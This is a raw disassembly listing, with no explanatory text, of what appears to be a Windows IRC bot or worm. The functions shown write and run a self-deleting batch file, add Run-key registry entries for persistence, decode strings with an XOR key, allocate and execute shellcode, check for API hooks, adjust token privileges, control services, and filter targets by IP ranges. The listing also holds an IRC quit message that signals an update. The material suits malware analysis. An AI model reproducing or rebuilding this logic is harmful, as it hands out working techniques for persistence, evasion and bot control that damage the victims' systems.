var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push esi
mov esi, ecx
mov cl, [eax]
test cl, cl
push edi
jz short loc_4190AD
loc_419052: ; CODE XREF: sub_419044+24�j
mov dl, [esi]
cmp dl, 2Ah
jz short loc_41906A
cmp dl, cl
jz short loc_419062
cmp dl, 3Fh
jnz short loc_419088
loc_419062: ; CODE XREF: sub_419044+17�j
inc esi
inc eax
mov cl, [eax]
test cl, cl
jnz short loc_419052
loc_41906A: ; CODE XREF: sub_419044+13�j
mov cl, [eax]
test cl, cl
jz short loc_4190AD
mov edi, [ebp+var_4]
loc_419073: ; CODE XREF: sub_419044+5F�j
mov dl, [esi]
cmp dl, 2Ah
jnz short loc_41908C
inc esi
cmp byte ptr [esi], 0
jz short loc_4190A7
mov [ebp+var_4], esi
lea edi, [eax+1]
jmp short loc_41909F
; ---------------------------------------------------------------------------
loc_419088: ; CODE XREF: sub_419044+1C�j
xor eax, eax
jmp short loc_4190B9
; ---------------------------------------------------------------------------
loc_41908C: ; CODE XREF: sub_419044+34�j
cmp dl, cl
jz short loc_41909D
cmp dl, 3Fh
jz short loc_41909D
mov esi, [ebp+var_4]
mov eax, edi
inc edi
jmp short loc_41909F
; ---------------------------------------------------------------------------
loc_41909D: ; CODE XREF: sub_419044+4A�j
; sub_419044+4F�j
inc esi
inc eax
loc_41909F: ; CODE XREF: sub_419044+42�j
; sub_419044+57�j
mov cl, [eax]
test cl, cl
jnz short loc_419073
jmp short loc_4190AD
; ---------------------------------------------------------------------------
loc_4190A7: ; CODE XREF: sub_419044+3A�j
xor eax, eax
inc eax
jmp short loc_4190B9
; ---------------------------------------------------------------------------
loc_4190AC: ; CODE XREF: sub_419044+6C�j
inc esi
loc_4190AD: ; CODE XREF: sub_419044+C�j
; sub_419044+2A�j ...
cmp byte ptr [esi], 2Ah
jz short loc_4190AC
xor eax, eax
cmp [esi], al
setz al
loc_4190B9: ; CODE XREF: sub_419044+46�j
; sub_419044+66�j
pop edi
pop esi
leave
retn
sub_419044 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4190BD proc near ; CODE XREF: sub_419477+14A�p
var_23C = byte ptr -23Ch
var_23B = byte ptr -23Bh
var_13C = byte ptr -13Ch
var_13B = byte ptr -13Bh
var_3C = byte ptr -3Ch
var_3B = byte ptr -3Bh
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 23Ch
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
xor ebx, ebx
push 37h
lea eax, [ebp+var_3B]
push ebx
push eax
mov [ebp+var_3C], bl
call sub_407B70
mov esi, 0FFh
push esi
lea eax, [ebp+var_23B]
push ebx
push eax
mov [ebp+var_23C], bl
call sub_407B70
push esi
lea eax, [ebp+var_13B]
push ebx
push eax
mov [ebp+var_13C], bl
call sub_407B70
add esp, 24h
push 100h
lea eax, [ebp+var_13C]
push eax
push ebx
call ds:dword_41D0E4 ; GetModuleHandleA
push eax
call ds:dword_41D060 ; GetModuleFileNameA
lea eax, [ebp+var_13C]
push eax
push eax
lea eax, [ebp+var_23C]
push offset a@echoOff1DelSI ; "@echo off\r\n:1\r\ndel \"%s\"\r\nif exist \"%s\" "...
push eax
call sub_4030B5
push 104h
call sub_402648
mov esi, eax
push esi
call sub_402A45
add esp, 18h
dec eax
push eax
push esi
call ds:dword_41D0F4 ; GetSystemDirectoryA
call sub_403363
push 18h
cdq
pop ecx
idiv ecx
add edx, 61h
push edx
call sub_403363
push 18h
cdq
pop ecx
idiv ecx
add edx, 61h
push edx
call sub_403363
push 18h
cdq
pop ecx
idiv ecx
add edx, 61h
push edx
call sub_403363
push 0Ah
cdq
pop ecx
idiv ecx
push edx
call sub_403363
push 0Ah
cdq
pop ecx
idiv ecx
push edx
call sub_403363
push 0Ah
pop ecx
cdq
idiv ecx
lea eax, [ebp+var_3C]
push edx
push esi
push offset aSTmpIIICCC_bat ; "%s\\tmp-%i%i%i-%c%c%c.bat"
push eax
call sub_4030B5
push esi
call sub_402B9B
lea eax, [ebp+var_3C]
push offset aW ; "w"
push eax
call sub_4031F4
mov esi, eax
add esp, 30h
cmp esi, ebx
jz short loc_41920B
lea eax, [ebp+var_23C]
push eax
push offset aS_13 ; "%s"
push esi
call sub_403207
push esi
call sub_4034C4
add esp, 10h
push ebx
push ebx
push ebx
lea eax, [ebp+var_3C]
push eax
push ebx
push ebx
call ds:dword_41D1E4
loc_41920B: ; CODE XREF: sub_4190BD+122�j
mov ecx, [ebp+var_4]
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4190BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419219 proc near ; CODE XREF: sub_41B925+199�p
; .text:0041BDC4�p
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_124 = dword ptr -124h
var_120 = byte ptr -120h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 170h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_8], eax
push ebx
push esi
push edi
xor ebx, ebx
push 40h
lea eax, [ebp+var_168]
push ebx
push eax
mov [ebp+var_16C], ebx
call sub_407B70
xor eax, eax
mov [ebp+var_124], ebx
lea edi, [ebp+var_120]
stosd
stosd
mov esi, 103h
push esi
stosd
lea eax, [ebp+var_113]
push ebx
push eax
mov [ebp+var_114], bl
call sub_407B70
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_114]
push esi
push eax
call sub_403436
add esp, 28h
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_16C]
push eax
push ebx
push ebx
push 28h
push ebx
push ebx
push ebx
lea eax, [ebp+var_114]
push eax
push ebx
call ds:dword_41D05C ; CreateProcessA
mov ecx, [ebp+var_8]
test eax, eax
pop edi
setnz al
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_419219 endp
; ---------------------------------------------------------------------------
push 0
call sub_403540
pop ecx
retn
; =============== S U B R O U T I N E =======================================
sub_4192C7 proc near ; CODE XREF: sub_413A2D+81�p
; sub_413A2D+94�p ...
push esi
mov esi, eax
xor eax, eax
inc eax
sub eax, ebx
add esi, eax
cmp esi, 1
jg short loc_4192DA
mov eax, ebx
pop esi
retn
; ---------------------------------------------------------------------------
loc_4192DA: ; CODE XREF: sub_4192C7+D�j
push 2
pop eax
cmp esi, eax
jle short loc_4192E7
loc_4192E1: ; CODE XREF: sub_4192C7+1E�j
add eax, eax
cmp eax, esi
jl short loc_4192E1
loc_4192E7: ; CODE XREF: sub_4192C7+18�j
push edi
lea edi, [eax-1]
loc_4192EB: ; CODE XREF: sub_4192C7+2D�j
call sub_418D5A
and eax, edi
cmp eax, esi
jge short loc_4192EB
pop edi
add eax, ebx
pop esi
retn
sub_4192C7 endp
; =============== S U B R O U T I N E =======================================
sub_4192FB proc near ; CODE XREF: sub_401F1C+420�p
; sub_413A2D:loc_413F5D�p ...
and dword_4265B0, 0
push 0
mov dword_4265B4, 1Fh
call sub_403540
mov edx, 3FFFFFFFh
and eax, edx
pop ecx
mov dword_4265B8, eax
mov dword_4265BC, 1
mov eax, offset dword_4265B8
push esi
loc_419330: ; CODE XREF: sub_4192FB+48�j
lea ecx, [eax+4]
mov esi, [ecx]
add esi, [eax]
and esi, edx
mov [eax+8], esi
mov eax, ecx
cmp eax, offset dword_42668C
jl short loc_419330
pop esi
retn
sub_4192FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419347 proc near ; CODE XREF: sub_41748B+E6�p
; sub_41A5C1+B6�p ...
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 24h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
push dword_4269BC
mov [ebp+var_14], 0
xor eax, eax
lea edi, [ebp+var_13]
stosd
stosd
stosd
stosw
lea esi, [ebp+var_14]
stosb
call sub_418FC6
pop ecx
mov eax, esi
mov ecx, offset a192_168__ ; "192.168.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a10___ ; "10.*.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a111___ ; "111.*.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a15___ ; "15.*.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a16___ ; "16.*.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a101___ ; "101.*.*.*"
call sub_419044
test eax, eax
jnz short loc_419467
mov eax, esi
mov ecx, offset a110___ ; "110.*.*.*"
call sub_419044
test eax, eax
jnz short loc_419467
mov eax, esi
mov ecx, offset a112___ ; "112.*.*.*"
call sub_419044
test eax, eax
jnz short loc_419467
mov eax, esi
mov ecx, offset a170_65__ ; "170.65.*.*"
call sub_419044
test eax, eax
jnz short loc_419467
push 10h
pop esi
loc_41941E: ; CODE XREF: sub_419347+11A�j
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
push esi
push offset a172_D__ ; "172.%d.*.*"
stosd
lea eax, [ebp+var_24]
push 0Fh
push eax
call sub_402AEE
lea eax, [ebp+var_24]
add esp, 10h
lea edx, [eax+1]
loc_419441: ; CODE XREF: sub_419347+FF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419441
sub eax, edx
mov [ebp+eax+var_24], cl
lea eax, [ebp+var_14]
lea ecx, [ebp+var_24]
call sub_419044
test eax, eax
jnz short loc_419467
inc esi
cmp esi, 1Fh
jbe short loc_41941E
xor al, al
jmp short loc_419469
; ---------------------------------------------------------------------------
loc_419467: ; CODE XREF: sub_419347+3E�j
; sub_419347+52�j ...
mov al, 1
loc_419469: ; CODE XREF: sub_419347+11E�j
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402710
leave
retn
sub_419347 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419477 proc near ; CODE XREF: sub_41B925+1C5�p
; .text:0041C066�p
var_2A8 = byte ptr -2A8h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = byte ptr -28Ch
var_28B = byte ptr -28Bh
var_1CC = byte ptr -1CCh
var_1CB = byte ptr -1CBh
var_CC = byte ptr -0CCh
var_CB = byte ptr -0CBh
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2A8h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, 0BFh
xor ebx, ebx
push esi
mov [ebp+var_298], eax
lea eax, [ebp+var_CB]
push ebx
push eax
mov [ebp+var_CC], bl
call sub_407B70
add esp, 0Ch
push esi
lea eax, [ebp+var_28B]
push ebx
push eax
mov [ebp+var_28C], bl
call sub_407B70
add esp, 0Ch
push ebx
lea edi, [ebp+var_CC]
call sub_41B7F9
pop ecx
inc esi
push esi
mov eax, edi
push ebx
push eax
call sub_407B70
add esp, 0Ch
push esi
lea eax, [ebp+var_28C]
push ebx
push eax
call sub_407B70
add esp, 0Ch
push 0FFh
lea eax, [ebp+var_1CB]
push ebx
push eax
mov [ebp+var_1CC], bl
call sub_407B70
mov eax, dword_433C4C
mov eax, [eax]
mov [ebp+var_290], eax
mov eax, offset dword_433C48
add esp, 0Ch
mov [ebp+var_294], eax
mov [ebp+var_2A0], eax
loc_419530: ; CODE XREF: sub_419477+102�j
mov eax, dword_433C4C
lea edi, [ebp+var_2A0]
lea esi, [ebp+var_294]
mov [ebp+var_29C], eax
call sub_40166F
test al, al
jz short loc_419587
mov edi, offset aRegistryMonito ; "Registry Monitor"
call sub_40164F
mov esi, eax
add esi, 5
push 11h
pop ecx
xor eax, eax
repe cmpsb
lea esi, [ebp+var_294]
jz short loc_41957B
lea edi, [ebp+var_2A8]
call sub_40168C
jmp short loc_419530
; ---------------------------------------------------------------------------
loc_41957B: ; CODE XREF: sub_419477+F5�j
call sub_40164F
mov eax, [eax]
call sub_414023
loc_419587: ; CODE XREF: sub_419477+D7�j
mov edi, 100h
push edi
lea esi, [ebp+var_1CC]
mov ebx, offset byte_425119
call sub_4196D1
pop ecx
mov eax, esi
push eax
push offset aSoftwareMicr_1 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_416F32
add esp, 0Ch
push edi
mov eax, esi
push 0
push eax
call sub_407B70
add esp, 0Ch
call sub_4190BD
push [ebp+var_298]
mov edi, offset dword_4269BC
push offset aQuitSYouKilled ; "QUIT :%s YOU KILLED ME :< --UPDATED\r\n"
call sub_4172CC
pop ecx
pop ecx
push 0
call ds:dword_41D050 ; ExitProcess
int 3 ; Trap to Debugger
jmp ds:dword_41D090
sub_419477 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4195EC proc near ; CODE XREF: .text:loc_41BC29�p
var_18 = byte ptr -18h
var_13 = byte ptr -13h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
push edi
call ds:dword_41D0CC ; GetCurrentProcess
mov esi, offset dword_420700
lea edi, [ebp+var_10]
movsd
movsd
push 40h
push 3000h
movsb
push 6
mov ebx, eax
xor edi, edi
push edi
lea eax, [ebp+var_18]
push ebx
mov [ebp+var_10+3], eax
call ds:dword_41D0C0 ; VirtualAllocEx
mov esi, eax
cmp esi, edi
jnz short loc_419635
loc_419631: ; CODE XREF: sub_4195EC+58�j
xor al, al
jmp short loc_419668
; ---------------------------------------------------------------------------
loc_419635: ; CODE XREF: sub_4195EC+43�j
push edi
push 40h
push 6
push esi
push ebx
call ds:dword_41D0C4 ; VirtualProtectEx
test eax, eax
jnz short loc_419631
mov eax, [ebp+var_10]
mov [esi], eax
mov eax, [ebp+var_C]
mov [esi+4], eax
call esi ; send
push 8000h
push edi
push esi
push ebx
call ds:dword_41D0C8 ; VirtualFreeEx
cmp [ebp+var_13], 0D0h
setnbe al
loc_419668: ; CODE XREF: sub_4195EC+47�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4195EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419677 proc near ; CODE XREF: .text:0041BC07�p
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = byte ptr -0Ah
var_9 = byte ptr -9
var_8 = byte ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
push offset aMessageboxa_0 ; "MessageBoxA"
push offset aUser32_dll_0 ; "user32.dll"
mov [ebp+var_C], 55h
mov [ebp+var_B], 8Bh
mov [ebp+var_A], 0ECh
mov [ebp+var_9], 81h
mov [ebp+var_8], 0ECh
call ds:dword_41D0E8 ; LoadLibraryA
push eax
call ds:dword_41D0EC ; GetProcAddress
push 5
mov esi, eax
pop ecx
xor eax, eax
lea edi, [ebp+var_C]
repe cmpsb
mov ecx, [ebp+var_4]
setz al
pop edi
xor ecx, ebp
pop esi
call sub_402710
leave
retn
sub_419677 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4196D1 proc near ; CODE XREF: sub_40177B+81�p
; sub_4019F3+81�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push edi
push [ebp+arg_0]
xor edi, edi
push edi
push esi
call sub_407B70
mov eax, ebx
add esp, 0Ch
lea ecx, [eax+1]
loc_4196EA: ; CODE XREF: sub_4196D1+1E�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4196EA
sub eax, ecx
jz short loc_41975B
mov eax, [ebp+arg_0]
dec eax
mov [ebp+var_4], eax
loc_4196FC: ; CODE XREF: sub_4196D1+88�j
mov eax, offset aHjdxzopvuvmrjf ; "hJdXZOPvUVmRJfVS"
lea edx, [eax+1]
loc_419704: ; CODE XREF: sub_4196D1+38�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419704
sub eax, edx
jz short loc_419711
xor eax, eax
loc_419711: ; CODE XREF: sub_4196D1+3C�j
movsx ecx, byte ptr [edi+ebx]
movsx eax, byte ptr aHjdxzopvuvmrjf[eax] ; "hJdXZOPvUVmRJfVS"
xor ecx, eax
xor ecx, 0FDh
push ecx
push esi
push offset aSC_0 ; "%s%c"
push [ebp+var_4]
push esi
call sub_402AEE
mov eax, esi
add esp, 14h
lea ecx, [eax+1]
loc_41973C: ; CODE XREF: sub_4196D1+70�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41973C
sub eax, ecx
mov [eax+esi], dl
mov eax, ebx
inc edi
lea ecx, [eax+1]
loc_41974E: ; CODE XREF: sub_4196D1+82�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41974E
sub eax, ecx
cmp edi, eax
jb short loc_4196FC
loc_41975B: ; CODE XREF: sub_4196D1+22�j
mov eax, esi
pop edi
leave
retn
sub_4196D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419760 proc near ; CODE XREF: sub_419C1D+28�p
var_3C = byte ptr -3Ch
var_38 = dword ptr -38h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 2Ch
push offset dword_4219D0
call __SEH_prolog4
mov edi, ds:dword_41D108
call edi ; GetTickCount
mov [ebp+var_20], eax
lea eax, [ebp+var_1C]
push eax
push 24h
lea eax, [ebp+var_3C]
push eax
push 0
push ebx
mov esi, ds:dword_41D028
call esi ; QueryServiceStatusEx
test eax, eax
jnz short loc_41979B
loc_419790: ; CODE XREF: sub_419760+61�j
; sub_419760+8A�j ...
call ds:dword_41D0F0 ; RtlGetLastWin32Error
jmp loc_41982F
; ---------------------------------------------------------------------------
loc_41979B: ; CODE XREF: sub_419760+2E�j
cmp [ebp+var_38], 1
jz loc_41982D
jmp short loc_4197D5
; ---------------------------------------------------------------------------
loc_4197A7: ; CODE XREF: sub_419760+79�j
push [ebp+var_24]
call ds:dword_41D0FC ; Sleep
lea eax, [ebp+var_1C]
push eax
push 24h
lea eax, [ebp+var_3C]
push eax
push 0
push ebx
call esi ; QueryServiceStatusEx
test eax, eax
jz short loc_419790
cmp [ebp+var_38], 1
jz short loc_41982D
call edi ; GetTickCount
sub eax, [ebp+var_20]
cmp eax, 12Ch
ja short loc_4197EE
loc_4197D5: ; CODE XREF: sub_419760+45�j
cmp [ebp+var_38], 3
jz short loc_4197A7
lea eax, [ebp+var_3C]
push eax
push 1
push ebx
call ds:dword_41D01C ; ControlService
test eax, eax
jz short loc_419790
jmp short loc_419827
; ---------------------------------------------------------------------------
loc_4197EE: ; CODE XREF: sub_419760+73�j
; sub_419760+C5�j
mov eax, 5B4h
jmp short loc_41982F
; ---------------------------------------------------------------------------
loc_4197F5: ; CODE XREF: sub_419760+CB�j
push [ebp+var_24]
call ds:dword_41D0FC ; Sleep
lea eax, [ebp+var_1C]
push eax
push 24h
lea eax, [ebp+var_3C]
push eax
push 0
push ebx
call esi ; QueryServiceStatusEx
test eax, eax
jz loc_419790
cmp [ebp+var_38], 1
jz short loc_41982D
call edi ; GetTickCount
sub eax, [ebp+var_20]
cmp eax, 12Ch
ja short loc_4197EE
loc_419827: ; CODE XREF: sub_419760+8C�j
cmp [ebp+var_38], 1
jnz short loc_4197F5
loc_41982D: ; CODE XREF: sub_419760+3F�j
; sub_419760+67�j ...
xor eax, eax
loc_41982F: ; CODE XREF: sub_419760+36�j
; sub_419760+93�j
call __SEH_epilog4
retn
sub_419760 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419835 proc near ; CODE XREF: sub_419EA0+2C7�p
; sub_419EA0+36E�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
push ebx
push esi
push edi
push 10h
pop esi
lea eax, [ebp+var_10]
push eax
push [ebp+arg_4]
xor edi, edi
push edi
mov [ebp+var_8], esi
call ds:dword_41D034 ; LookupPrivilegeValueA
test eax, eax
jnz short loc_41985C
loc_419858: ; CODE XREF: sub_419835+5F�j
xor al, al
jmp short loc_4198CD
; ---------------------------------------------------------------------------
loc_41985C: ; CODE XREF: sub_419835+21�j
mov eax, [ebp+var_10]
mov [ebp+var_2C], eax
mov eax, [ebp+var_C]
mov [ebp+var_28], eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_20]
push eax
push esi
mov esi, ds:dword_41D014
lea eax, [ebp+var_30]
push eax
push edi
push [ebp+arg_0]
xor ebx, ebx
inc ebx
mov [ebp+var_30], ebx
mov [ebp+var_24], edi
call esi ; AdjustTokenPrivileges
mov edi, ds:dword_41D0F0
call edi ; RtlGetLastWin32Error
test eax, eax
jnz short loc_419858
mov eax, [ebp+var_10]
mov [ebp+var_1C], eax
mov eax, [ebp+var_C]
mov [ebp+var_18], eax
xor eax, eax
cmp [ebp+arg_8], eax
mov [ebp+var_20], ebx
jz short loc_4198B2
or [ebp+var_14], 2
jmp short loc_4198B6
; ---------------------------------------------------------------------------
loc_4198B2: ; CODE XREF: sub_419835+75�j
and [ebp+var_14], 0FFFFFFFDh
loc_4198B6: ; CODE XREF: sub_419835+7B�j
push eax
push eax
push [ebp+var_8]
lea ecx, [ebp+var_20]
push ecx
push eax
push [ebp+arg_0]
call esi ; AdjustTokenPrivileges
call edi ; RtlGetLastWin32Error
neg eax
sbb al, al
inc al
loc_4198CD: ; CODE XREF: sub_419835+25�j
pop edi
pop esi
pop ebx
leave
retn
sub_419835 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4198D2 proc near ; CODE XREF: sub_419EA0+400�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
lea eax, [ebp+var_8]
push eax
push [ebp+arg_8]
xor ebx, ebx
push [ebp+arg_C]
mov [ebp+var_8], ebx
push [ebp+arg_4]
push [ebp+arg_0]
call dword_426570
test eax, eax
jnz short loc_419909
loc_4198F9: ; CODE XREF: sub_4198D2+70�j
; sub_4198D2+74�j
push [ebp+arg_C]
call sub_402B9B
pop ecx
pop edi
pop esi
mov al, bl
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_419909: ; CODE XREF: sub_4198D2+25�j
xor eax, eax
loc_41990B: ; CODE XREF: sub_4198D2+6C�j
and [ebp+var_4], 0
mov edx, offset dword_4255E8
loc_419914: ; CODE XREF: sub_4198D2+66�j
mov esi, [ebp+arg_C]
mov ecx, [edx+80h]
add esi, eax
mov edi, edx
xor ebx, ebx
repe cmpsb
jz short loc_419944
mov ecx, 84h
add [ebp+var_4], ecx
add edx, ecx
cmp [ebp+var_4], 318h
jb short loc_419914
inc eax
cmp eax, [ebp+var_8]
jbe short loc_41990B
xor bl, bl
jmp short loc_4198F9
; ---------------------------------------------------------------------------
loc_419944: ; CODE XREF: sub_4198D2+53�j
mov bl, 1
jmp short loc_4198F9
sub_4198D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419948 proc near ; CODE XREF: sub_419EA0+483�p
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
mov [ebp+var_1C], 1Ch
call dword_42656C
test eax, eax
jnz short loc_41996A
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_41996A: ; CODE XREF: sub_419948+1C�j
; sub_419948+55�j
mov eax, [ebp+var_10]
cmp eax, [ebp+arg_0]
jnz short loc_41998E
push [ebp+var_14]
push 0
push 1F03FFh
call dword_426580
push eax
call ds:dword_41D0D4 ; ResumeThread
cmp eax, 0FFFFFFFFh
jz short loc_41999F
loc_41998E: ; CODE XREF: sub_419948+28�j
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
call dword_426590
test eax, eax
jnz short loc_41996A
loc_41999F: ; CODE XREF: sub_419948+44�j
push [ebp+arg_4]
call ds:dword_41D0DC ; CloseHandle
mov al, 1
leave
retn
sub_419948 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4199AC proc near ; CODE XREF: sub_419EA0+3BD�p
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1Ch
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
mov [ebp+var_1C], 1Ch
call dword_42656C
test eax, eax
jnz short loc_4199CE
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_4199CE: ; CODE XREF: sub_4199AC+1C�j
; sub_4199AC+55�j
mov eax, [ebp+var_10]
cmp eax, [ebp+arg_0]
jnz short loc_4199F2
push [ebp+var_14]
push 0
push 1F03FFh
call dword_426580
push eax
call ds:dword_41D0D8 ; SuspendThread
cmp eax, 0FFFFFFFFh
jz short loc_419A03
loc_4199F2: ; CODE XREF: sub_4199AC+28�j
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_4]
call dword_426590
test eax, eax
jnz short loc_4199CE
loc_419A03: ; CODE XREF: sub_4199AC+44�j
push [ebp+arg_4]
call ds:dword_41D0DC ; CloseHandle
mov al, 1
leave
retn
sub_4199AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419A10 proc near ; CODE XREF: sub_419EA0+3D4�p
var_228 = dword ptr -228h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 228h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push edi
push [ebp+arg_0]
xor ebx, ebx
push 8
call dword_426574
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_419A49
loc_419A39: ; CODE XREF: sub_419A10+53�j
xor al, al
loc_419A3B: ; CODE XREF: sub_419A10+8D�j
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
; ---------------------------------------------------------------------------
loc_419A49: ; CODE XREF: sub_419A10+27�j
lea eax, [ebp+var_228]
push eax
push edi
mov [ebp+var_228], 224h
call dword_426568
test eax, eax
jz short loc_419A39
loc_419A65: ; CODE XREF: sub_419A10+6B�j
inc ebx
cmp ebx, 1
jz short loc_419A81
lea eax, [ebp+var_228]
push eax
push edi
call dword_426584
test eax, eax
jnz short loc_419A65
xor bl, bl
jmp short loc_419A94
; ---------------------------------------------------------------------------
loc_419A81: ; CODE XREF: sub_419A10+59�j
mov eax, [ebp+var_214]
mov [esi], eax
mov eax, [ebp+var_210]
mov [esi+4], eax
mov bl, 1
loc_419A94: ; CODE XREF: sub_419A10+6F�j
push edi
call ds:dword_41D0DC ; CloseHandle
mov al, bl
jmp short loc_419A3B
sub_419A10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=1B4h
sub_419A9F proc near ; CODE XREF: sub_419E55+2D�p
var_234 = dword ptr -234h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_214 = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-1B4h]
sub esp, 234h
mov eax, dword_423064
xor eax, ebp
mov [ebp+1B4h+var_4], eax
mov eax, [ebp+1B4h+arg_0]
push ebx
push esi
push edi
xor ebx, ebx
push 0FFh
mov [ebp+1B4h+var_224], eax
lea eax, [ebp+1B4h+var_103]
push ebx
push eax
mov [ebp+1B4h+var_234], offset aSoftwareMicr_2 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_230], offset aSoftwareMicr_3 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_22C], offset aSoftwareMicr_4 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_228], offset aSoftwareMicr_5 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov [ebp+1B4h+var_104], bl
call sub_407B70
mov esi, 100h
add esp, 0Ch
mov [ebp+1B4h+var_21C], esi
mov [ebp+1B4h+var_214], esi
mov [ebp+1B4h+var_20C], offset dword_4255DC
mov [ebp+1B4h+var_220], 2
loc_419B18: ; CODE XREF: sub_419A9F+160�j
